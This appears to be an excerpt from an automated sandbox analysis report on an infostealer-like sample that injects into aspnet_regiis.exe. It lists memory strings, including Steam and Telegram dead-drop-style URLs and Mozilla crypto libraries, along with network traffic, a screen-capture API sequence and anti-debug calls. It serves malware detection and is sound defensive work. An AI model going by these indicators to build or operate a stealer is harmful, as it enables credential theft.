                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/explore/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/legal/
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/mobile
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/news/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/points/shop/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/stats/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                          Source: BKJKEB.3.drString found in binary or memory: https://support.mozilla.org
                          Source: BKJKEB.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: BKJKEB.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
                          Source: file.exe, 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003290000.00000004.00000020.00020000.00000000.sdmp, GIEBFH.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: file.exeString found in binary or memory: https://www.entrust.net/rpa0
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                          Source: aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                          Source: aspnet_regiis.exe, 00000003.00000003.1589017924.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                          Source: aspnet_regiis.exe, 00000003.00000003.1589017924.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003290000.00000004.00000020.00020000.00000000.sdmp, GIEBFH.3.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                          Source: BKJKEB.3.drString found in binary or memory: https://www.mozilla.org
                          Source: aspnet_regiis.exe, 00000003.00000002.2584671634.000000001B9DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: BKJKEB.3.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
                          Source: aspnet_regiis.exe, 00000003.00000002.2584671634.000000001B9DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: BKJKEB.3.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                          Source: aspnet_regiis.exe, 00000003.00000002.2584671634.000000001B9DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                          Source: aspnet_regiis.exe, 00000003.00000003.1873200462.00000000220BE000.00000004.00000020.00020000.00000000.sdmp, BKJKEB.3.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                          Source: BKJKEB.3.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: aspnet_regiis.exe, 00000003.00000002.2584671634.000000001B9DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: aspnet_regiis.exe, 00000003.00000003.1873200462.00000000220BE000.00000004.00000020.00020000.00000000.sdmp, BKJKEB.3.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57955 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57953 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57949
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57948
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57959 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57949 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57957 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57961 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57966
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57947
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57969
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57946
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57968
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57963
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57962
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57965
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57964
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57950
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57964 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57947 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57968 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57966 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57950 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57954 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57952 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57959
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57956 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57958 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57948 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57956
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57955
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57962 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57958
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57960 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57957
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57952
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57951
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57954
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57953
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57961
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57960
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57946 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57963 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57969 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57965 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 57951 -> 443
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:57946 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.7:57947 version: TLS 1.2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,3_2_00411F55

                          System Summary

                          barindex
                          PE file contains section with special chars
                          Source: file.exeStatic PE information: section name: 25W~Dos
                          PE file has nameless sections
                          Source: file.exeStatic PE information: section name:
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7499B0 GetModuleHandleW,NtQueryInformationProcess,0_2_6D7499B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess,3_2_0040145B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC8B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,3_2_6CC8B700
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC8B8C0 rand_s,NtQueryVirtualMemory,3_2_6CC8B8C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC8B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,3_2_6CC8B910
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC2F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,3_2_6CC2F280
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7499B00_2_6D7499B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D747B600_2_6D747B60
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D749EF00_2_6D749EF0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D759D700_2_6D759D70
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7541400_2_6D754140
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D75A5300_2_6D75A530
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7490700_2_6D749070
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7534400_2_6D753440
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7530300_2_6D753030
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7410100_2_6D741010
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7548100_2_6D754810
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D75B8100_2_6D75B810
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7428000_2_6D742800
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D752C000_2_6D752C00
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7690E50_2_6D7690E5
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7574D00_2_6D7574D0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D751CC00_2_6D751CC0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D75B4C00_2_6D75B4C0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7558B00_2_6D7558B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7448A00_2_6D7448A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D75A8A00_2_6D75A8A0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D75AF400_2_6D75AF40
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7583200_2_6D758320
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7543C00_2_6D7543C0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7577900_2_6D757790
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D743A700_2_6D743A70
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D75BE300_2_6D75BE30
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7442200_2_6D744220
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D752A200_2_6D752A20
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D742E000_2_6D742E00
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D753E000_2_6D753E00
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D758EC00_2_6D758EC0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D756EC00_2_6D756EC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041C4723_2_0041C472
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042D9333_2_0042D933
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042D1C33_2_0042D1C3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042D5613_2_0042D561
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041950A3_2_0041950A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042DD1B3_2_0042DD1B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042CD2E3_2_0042CD2E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041B7123_2_0041B712
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC235A03_2_6CC235A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC364C03_2_6CC364C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC4D4D03_2_6CC4D4D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC2D4E03_2_6CC2D4E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC66CF03_2_6CC66CF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC36C803_2_6CC36C80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC834A03_2_6CC834A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC8C4A03_2_6CC8C4A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC354403_2_6CC35440
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC9545C3_2_6CC9545C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC9AC003_2_6CC9AC00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC65C103_2_6CC65C10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC72C103_2_6CC72C10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC9542B3_2_6CC9542B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC60DD03_2_6CC60DD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC885F03_2_6CC885F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC3FD003_2_6CC3FD00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC4ED103_2_6CC4ED10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC505123_2_6CC50512
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC976E33_2_6CC976E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC2BEF03_2_6CC2BEF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC3FEF03_2_6CC3FEF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC8E6803_2_6CC8E680
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC45E903_2_6CC45E90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC84EA03_2_6CC84EA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC446403_2_6CC44640
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC72E4E3_2_6CC72E4E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC49E503_2_6CC49E50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC63E503_2_6CC63E50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC96E633_2_6CC96E63
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC2C6703_2_6CC2C670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC756003_2_6CC75600
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC67E103_2_6CC67E10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC89E303_2_6CC89E30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC2DFE03_2_6CC2DFE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC56FF03_2_6CC56FF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC777A03_2_6CC777A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC39F003_2_6CC39F00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC677103_2_6CC67710
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC950C73_2_6CC950C7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC4C0E03_2_6CC4C0E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC658E03_2_6CC658E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC560A03_2_6CC560A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC488503_2_6CC48850
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC4D8503_2_6CC4D850
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC6F0703_2_6CC6F070
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC378103_2_6CC37810
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC6B8203_2_6CC6B820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC748203_2_6CC74820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC651903_2_6CC65190
